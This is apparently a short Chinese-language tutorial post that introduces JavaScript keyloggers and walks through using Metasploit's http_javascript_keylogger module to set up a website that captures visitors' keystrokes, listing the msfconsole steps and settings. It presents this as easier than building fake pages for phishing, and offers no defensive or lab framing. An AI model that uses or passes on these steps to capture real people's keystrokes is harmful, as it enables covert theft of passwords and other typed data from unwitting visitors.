Javascript keylogger简介:
Javascript keylogger可以捕捉通过网络的键盘击键事件。使用JavaScript keylogger的优势在于:他不需要我们预先拥有一个服务器空间,然后再上传一个假冒的网页,写伪造的页面、插链接
再写个蛋疼的采集脚本(如下图)…
使用Metasploit制造键盘窃听网站:
1. 打开msfconsle
2.搜索Keylogger
3.使用auxiliary/server/capture/http_javascript_keylogger模块
4.查看模块配置情况
5.我们这里以rapid7提供的Demo为例(页面比较简单)进行配置:
Set demo true
Set uripath keylogger
6.执行攻击模块
内容全部来源于网络收集,如有侵权,请联系网站删除!